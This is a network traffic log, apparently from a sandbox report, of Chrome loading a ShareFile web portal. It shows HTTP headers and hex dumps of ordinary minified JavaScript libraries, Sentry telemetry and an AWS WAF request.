                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:07 GMT
                                                                                                                                                                                                                      ETag: "b5d95b131a56925ed34b1cf110473319"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 6e44e48abc671a9155ea845c36f68920.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: rELQdBVflAP4eOFFCpJ3Sz8S__3nJc6ebOtdRSalpkSAyCgzAmBh_A==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 75 73 65 72 61 63 74 69 6f 6e 73 70 69 6c 65 74 2c 7b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 3a 22 63 69 74 72 69 74 65 2d 63 69 74 72 69 78 2d 75 69 2e 6a 73 22 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 63 6f 6e 66 69 72 6d 4d 6f
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevuseractionspilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"})System.register(["@citrite/citrix-ui@25.46.0","react","react-router"],(function(e,t){var r={},n={},o={};return{setters:[function(e){r.confirmMo
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 79 70 65 6f 66 20 72 3d 3d 3d 65 7c 7c 22 61 22 2b 28 74 3c 31 3f 22 6e 20 22 3a 22 20 22 29 2b 65 7d 7d 29 29 3b 76 61 72 20 73 3d 7b 7d 3b 69 2e 74 72 61 6e 73 69 74 69 6f 6e 61 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 5b 41 78 69 6f 73 20 76 22 2b 6e 2b 22 5d 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 20 6f 70 74 69 6f 6e 20 27 22 2b 65 2b 22 27 22 2b 74 2b 28 72 3f 22 2e 20 22 2b 72 3a 22 22 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 72 2c 6e 2c 61 29 7b 69 66 28 21 31 3d 3d 3d 65 29 74 68 72 6f 77 20 6e 65 77 20 6f 28 69 28 6e 2c 22 20 68 61 73 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 22 2b 28 74 3f 22 20 69 6e 20 22 2b 74 3a 22 22 29 29 2c 6f 2e 45 52 52 5f 44 45
                                                                                                                                                                                                                      Data Ascii: ypeof r===e||"a"+(t<1?"n ":" ")+e}}));var s={};i.transitional=function(e,t,r){function i(e,t){return"[Axios v"+n+"] Transitional option '"+e+"'"+t+(r?". "+r:"")}return function(r,n,a){if(!1===e)throw new o(i(n," has been removed"+(t?" in "+t:"")),o.ERR_DE
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC4360INData Raw: 7b 34 7d 28 28 28 3a 5b 30 2d 39 41 2d 46 61 2d 66 5d 7b 31 2c 34 7d 29 7b 31 2c 33 7d 29 7c 28 28 3a 5b 30 2d 39 41 2d 46 61 2d 66 5d 7b 31 2c 34 7d 29 3f 3a 28 28 32 35 5b 30 2d 35 5d 7c 32 5b 30 2d 34 5d 5c 64 7c 31 5c 64 5c 64 7c 5b 31 2d 39 5d 3f 5c 64 29 28 5c 2e 28 32 35 5b 30 2d 35 5d 7c 32 5b 30 2d 34 5d 5c 64 7c 31 5c 64 5c 64 7c 5b 31 2d 39 5d 3f 5c 64 29 29 7b 33 7d 29 29 7c 3a 29 29 7c 28 28 5b 30 2d 39 41 2d 46 61 2d 66 5d 7b 31 2c 34 7d 3a 29 7b 33 7d 28 28 28 3a 5b 30 2d 39 41 2d 46 61 2d 66 5d 7b 31 2c 34 7d 29 7b 31 2c 34 7d 29 7c 28 28 3a 5b 30 2d 39 41 2d 46 61 2d 66 5d 7b 31 2c 34 7d 29 7b 30 2c 32 7d 3a 28 28 32 35 5b 30 2d 35 5d 7c 32 5b 30 2d 34 5d 5c 64 7c 31 5c 64 5c 64 7c 5b 31 2d 39 5d 3f 5c 64 29 28 5c 2e 28 32 35 5b 30 2d 35
                                                                                                                                                                                                                      Data Ascii: {4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 67 28 30 2c 72 29 29 2c 22 2f 2f 22 3d 3d 3d 28 65 3d 28 65 3d 65 2e 72 65 70 6c 61 63 65 28 2f 5e 28 68 74 74 70 73 3f 7c 66 74 70 7c 77 73 73 3f 29 3f 3a 2b 5b 2f 5c 5c 5d 2a 2f 69 2c 22 24 31 3a 2f 2f 22 29 29 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 2f 5c 5c 5d 7b 32 2c 7d 2f 69 2c 22 2f 2f 22 29 29 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 32 29 3f 28 74 2e 70 72 6f 74 6f 63 6f 6c 3d 6e 75 6c 6c 2c 65 3d 65 2e 73 75 62 73 74 72 69 6e 67 28 32 29 2c 65 3d 69 2e 70 61 72 73 65 41 75 74 68 6f 72 69 74 79 28 65 2c 74 29 29 3a 28 72 3d 65 2e 69 6e 64 65 78 4f 66 28 22 3a 22 29 29 3e 2d 31 26 26 28 74 2e 70 72 6f 74 6f 63 6f 6c 3d 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 72 29 7c 7c 6e 75 6c 6c 2c 74 2e 70 72 6f 74 6f 63 6f 6c 26 26 21 74 2e 70 72 6f 74 6f 63 6f
                                                                                                                                                                                                                      Data Ascii: g(0,r)),"//"===(e=(e=e.replace(/^(https?|ftp|wss?)?:+[/\\]*/i,"$1://")).replace(/^[/\\]{2,}/i,"//")).substring(0,2)?(t.protocol=null,e=e.substring(2),e=i.parseAuthority(e,t)):(r=e.indexOf(":"))>-1&&(t.protocol=e.substring(0,r)||null,t.protocol&&!t.protoco
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC10890INData Raw: 74 68 3b 6f 3c 73 3b 6f 2b 2b 29 6e 5b 6f 5d 3d 69 2e 64 65 63 6f 64 65 28 6e 5b 6f 5d 29 3b 65 6c 73 65 20 6e 3d 6e 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 69 2e 64 65 63 6f 64 65 28 6e 29 3a 75 6e 64 65 66 69 6e 65 64 3b 72 65 74 75 72 6e 20 6e 7d 69 66 28 66 28 74 29 29 66 6f 72 28 6f 3d 30 2c 73 3d 74 2e 6c 65 6e 67 74 68 3b 6f 3c 73 3b 6f 2b 2b 29 74 5b 6f 5d 3d 69 2e 65 6e 63 6f 64 65 28 74 5b 6f 5d 29 3b 65 6c 73 65 20 74 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 7c 7c 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 3f 69 2e 65 6e 63 6f 64 65 28 74 29 3a 74 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 65 67 6d 65 6e 74 28 65 2c 74 2c 72 29 7d 3b 76 61 72 20 50 3d 73 2e 71 75 65 72 79 3b 72 65 74 75 72 6e 20 73 2e 71 75 65 72 79
                                                                                                                                                                                                                      Data Ascii: th;o<s;o++)n[o]=i.decode(n[o]);else n=n!==undefined?i.decode(n):undefined;return n}if(f(t))for(o=0,s=t.length;o<s;o++)t[o]=i.encode(t[o]);else t="string"==typeof t||t instanceof String?i.encode(t):t;return this.segment(e,t,r)};var P=s.query;return s.query
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 75 72 6e 20 74 68 69 73 7d 29 29 3b 76 61 72 20 78 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 4f 3d 78 26 26 78 28 78 28 4c 28 5b 5d 29 29 29 3b 4f 26 26 4f 21 3d 3d 69 26 26 73 2e 63 61 6c 6c 28 4f 2c 63 29 26 26 28 53 3d 4f 29 3b 76 61 72 20 41 3d 6b 2e 70 72 6f 74 6f 74 79 70 65 3d 5f 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 53 29 3b 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 5b 22 6e 65 78 74 22 2c 22 74 68 72 6f 77 22 2c 22 72 65 74 75 72 6e 22 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 64 28 65 2c 74 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 6e 76 6f 6b 65 28 74 2c 65 29 7d 29 29 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 45 28
                                                                                                                                                                                                                      Data Ascii: urn this}));var x=Object.getPrototypeOf,O=x&&x(x(L([])));O&&O!==i&&s.call(O,c)&&(S=O);var A=k.prototype=_.prototype=Object.create(S);function P(e){["next","throw","return"].forEach((function(t){d(e,t,(function(e){return this._invoke(t,e)}))}))}function E(
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 55 6e 61 76 61 69 6c 61 62 6c 65 22 7d 28 52 7c 7c 28 52 3d 7b 7d 29 29 3b 76 61 72 20 4c 3d 7b 70 72 65 52 65 71 75 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 2c 70 6f 73 74 52 65 71 75 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 7d 2c 72 65 66 72 65 73 68 41 63 63 65 73 73 54 6f 6b 65 6e 3a 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 4e 28 65 29 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 4c 2c 65 29 2c 4c 2e 62 61 73 65 41 70 69 55 72 6c 26 26 21 4c 2e 62 61 73 65 41 70 69 55 72 6c 2e 65 6e 64 73 57 69 74 68 28 22 2f 22 29 26 26 28 4c 2e 62 61 73 65 41 70 69 55 72 6c 2b 3d 22 2f 22 29 7d 76 61 72 20 46 3d 5b 5d 3b 76 61 72 20 44 3d 66 75 6e 63 74
                                                                                                                                                                                                                      Data Ascii: Unavailable"}(R||(R={}));var L={preRequest:function(e){return e},postRequest:function(){return Promise.resolve()},refreshAccessToken:null};function N(e){Object.assign(L,e),L.baseApiUrl&&!L.baseApiUrl.endsWith("/")&&(L.baseApiUrl+="/")}var F=[];var D=funct
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 75 6e 63 74 69 6f 6e 20 71 65 28 65 2c 74 29 7b 73 77 69 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 34 35 5e 47 28 65 2c 30 29 3f 28 28 28 74 3c 3c 32 5e 47 28 65 2c 30 29 29 3c 3c 32 5e 47 28 65 2c 31 29 29 3c 3c 32 5e 47 28 65 2c 32 29 29 3c 3c 32 5e 47 28 65 2c 33 29 3a 30 7d 28 65 2c 74 29 29 7b 63 61 73 65 20 35 31 30 33 3a 72 65 74 75 72 6e 20 53 65 2b 22 70 72 69 6e 74 2d 22 2b 65 2b 65 3b 63 61 73 65 20 35 37 33 37 3a 63 61 73 65 20 34 32 30 31 3a 63 61 73 65 20 33 31 37 37 3a 63 61 73 65 20 33 34 33 33 3a 63 61 73 65 20 31 36 34 31 3a 63 61 73 65 20 34 34 35 37 3a 63 61 73 65 20 32 39 32 31 3a 63 61 73 65 20 35 35 37 32 3a 63 61 73 65 20 36 33 35 36 3a 63 61 73 65 20 35 38 34 34 3a 63 61 73 65 20 33 31 39 31 3a 63
                                                                                                                                                                                                                      Data Ascii: unction qe(e,t){switch(function(e,t){return 45^G(e,0)?(((t<<2^G(e,0))<<2^G(e,1))<<2^G(e,2))<<2^G(e,3):0}(e,t)){case 5103:return Se+"print-"+e+e;case 5737:case 4201:case 3177:case 3433:case 1641:case 4457:case 2921:case 5572:case 6356:case 5844:case 3191:c
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC2256INData Raw: 72 26 26 28 65 5b 6e 5d 3d 74 5b 6e 5d 29 3a 7a 74 28 65 5b 6e 5d 2c 74 5b 6e 5d 2c 72 29 3a 65 5b 6e 5d 3d 74 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 2d 5c 5b 5c 5d 5c 2f 5c 7b 5c 7d 5c 28 5c 29 5c 2a 5c 2b 5c 3f 5c 2e 5c 5c 5c 5e 5c 24 5c 7c 5d 2f 67 2c 22 5c 5c 24 26 22 29 7d 76 61 72 20 42 74 3d 7b 22 26 22 3a 22 26 61 6d 70 3b 22 2c 22 3c 22 3a 22 26 6c 74 3b 22 2c 22 3e 22 3a 22 26 67 74 3b 22 2c 27 22 27 3a 22 26 71 75 6f 74 3b 22 2c 22 27 22 3a 22 26 23 33 39 3b 22 2c 22 2f 22 3a 22 26 23 78 32 46 3b 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 4d 74 28 65 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 2e 72 65 70
                                                                                                                                                                                                                      Data Ascii: r&&(e[n]=t[n]):zt(e[n],t[n],r):e[n]=t[n]);return e}function qt(e){return e.replace(/[\-\[\]\/\{\}\(\)\*\+\?\.\\\^\$\|]/g,"\\$&")}var Bt={"&":"&amp;","<":"&lt;",">":"&gt;",'"':"&quot;","'":"&#39;","/":"&#x2F;"};function Mt(e){return"string"==typeof e?e.rep
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC14128INData Raw: 69 6f 6e 22 5d 2c 64 65 66 61 75 6c 74 4e 53 3a 22 74 72 61 6e 73 6c 61 74 69 6f 6e 22 7d 3b 72 65 74 75 72 6e 20 76 74 28 74 68 69 73 2c 72 29 2c 6e 3d 74 2e 63 61 6c 6c 28 74 68 69 73 29 2c 51 74 26 26 6a 74 2e 63 61 6c 6c 28 5f 74 28 6e 29 29 2c 6e 2e 64 61 74 61 3d 65 7c 7c 7b 7d 2c 6e 2e 6f 70 74 69 6f 6e 73 3d 6f 2c 6e 2e 6f 70 74 69 6f 6e 73 2e 6b 65 79 53 65 70 61 72 61 74 6f 72 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 6e 2e 6f 70 74 69 6f 6e 73 2e 6b 65 79 53 65 70 61 72 61 74 6f 72 3d 22 2e 22 29 2c 6e 2e 6f 70 74 69 6f 6e 73 2e 69 67 6e 6f 72 65 4a 53 4f 4e 53 74 72 75 63 74 75 72 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 6e 2e 6f 70 74 69 6f 6e 73 2e 69 67 6e 6f 72 65 4a 53 4f 4e 53 74 72 75 63 74 75 72 65 3d 21 30 29 2c 6e 7d 72 65
                                                                                                                                                                                                                      Data Ascii: ion"],defaultNS:"translation"};return vt(this,r),n=t.call(this),Qt&&jt.call(_t(n)),n.data=e||{},n.options=o,n.options.keySeparator===undefined&&(n.options.keySeparator="."),n.options.ignoreJSONStructure===undefined&&(n.options.ignoreJSONStructure=!0),n}re


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      23192.168.2.174973513.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC606OUTGET /sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC588INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 6490
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Mon, 26 Aug 2024 12:30:04 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:07 GMT
                                                                                                                                                                                                                      ETag: "fae76dae7784930e96292b65feedbc0d"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 25fe70cc18ad9b2503949e3460083640.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 4AeT4LacOmdViRWXaU3i8SiVhGffqZ4YK6GMJQ1eaH0OKYxnmdZmtA==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC6490INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 65 6d 65 64 69 61 74 69 6f 6e 70 69 6c 65 74 2c 7b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 3a 22 63 69 74 72 69 74 65 2d 63 69 74 72 69 78 2d 75 69 2e 6a 73 22 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 3b 72
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevremediationpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"})System.register(["@citrite/citrix-ui@25.46.0","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},o={},a={},i={};r


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      24192.168.2.174974134.120.195.2494437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC780OUTPOST /api/4506735163932672/envelope/?sentry_key=0be0069dd70d0ce2c63c650418f56fa6&sentry_version=7&sentry_client=sentry.javascript.react%2F7.100.1 HTTP/1.1
                                                                                                                                                                                                                      Host: o49063.ingest.sentry.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Content-Length: 470
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Referer: https://averellharriman.sharefile.com/
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC470OUTData Raw: 7b 22 73 65 6e 74 5f 61 74 22 3a 22 32 30 32 34 2d 31 31 2d 30 35 54 31 39 3a 33 36 3a 30 35 2e 33 35 32 5a 22 2c 22 73 64 6b 22 3a 7b 22 6e 61 6d 65 22 3a 22 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 72 65 61 63 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 37 2e 31 30 30 2e 31 22 7d 7d 0a 7b 22 74 79 70 65 22 3a 22 73 65 73 73 69 6f 6e 22 7d 0a 7b 22 73 69 64 22 3a 22 32 38 37 66 32 35 66 31 30 65 65 63 34 62 37 31 61 31 30 39 66 36 33 61 64 62 32 61 33 31 34 31 22 2c 22 69 6e 69 74 22 3a 74 72 75 65 2c 22 73 74 61 72 74 65 64 22 3a 22 32 30 32 34 2d 31 31 2d 30 35 54 31 39 3a 33 36 3a 30 35 2e 33 35 32 5a 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 31 2d 30 35 54 31 39 3a 33 36 3a 30 35 2e 33 35 32 5a 22 2c 22 73 74 61 74 75
                                                                                                                                                                                                                      Data Ascii: {"sent_at":"2024-11-05T19:36:05.352Z","sdk":{"name":"sentry.javascript.react","version":"7.100.1"}}{"type":"session"}{"sid":"287f25f10eec4b71a109f63adb2a3141","init":true,"started":"2024-11-05T19:36:05.352Z","timestamp":"2024-11-05T19:36:05.352Z","statu
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC521INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:06 GMT
                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                      Content-Length: 2
                                                                                                                                                                                                                      vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                      access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                      Data Ascii: {}


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      25192.168.2.174973918.245.175.1004437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC404OUTGET /0093b71e39a6/478ed03bbf12/verify HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC448INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:06 GMT
                                                                                                                                                                                                                      allow: POST
                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                      expires: 0
                                                                                                                                                                                                                      x-amzn-waf-challenge-id: Root=1-672a73a6-05a18db850b796170e4576f5
                                                                                                                                                                                                                      X-Cache: Error from cloudfront
                                                                                                                                                                                                                      Via: 1.1 e53cac505b9e6fe0cb7c5e1c9c4f50b2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: CDG55-P1
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      X-Amz-Cf-Id: FfGqAK52HvaiUn0buiq-RpBX0ostc3kbShwRggJ4qRWQmWplKS7MYQ==


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      26192.168.2.174974076.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC1318OUTGET /bundles/92fe442fb8f2d1f7093b.js HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
